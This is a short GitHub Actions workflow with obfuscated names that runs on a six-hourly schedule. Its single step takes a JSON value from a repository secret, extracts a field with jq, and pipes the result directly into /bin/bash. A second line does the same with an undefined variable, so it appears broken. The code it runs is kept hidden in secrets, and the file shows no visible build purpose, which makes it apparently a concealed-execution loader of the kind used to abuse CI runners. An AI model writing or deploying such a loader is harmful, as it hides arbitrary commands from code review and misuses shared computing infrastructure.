name: jiaoenyu3421
on:
  workflow_dispatch:
  schedule:
    - cron: '42 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiaoenyu3421
        env:
          z071: ${{ secrets.z071 }}
        run: |
          echo $z071 | jq -r .pt4184 | /bin/bash
          echo $u01 | jq -r .qw8127 | /bin/bash

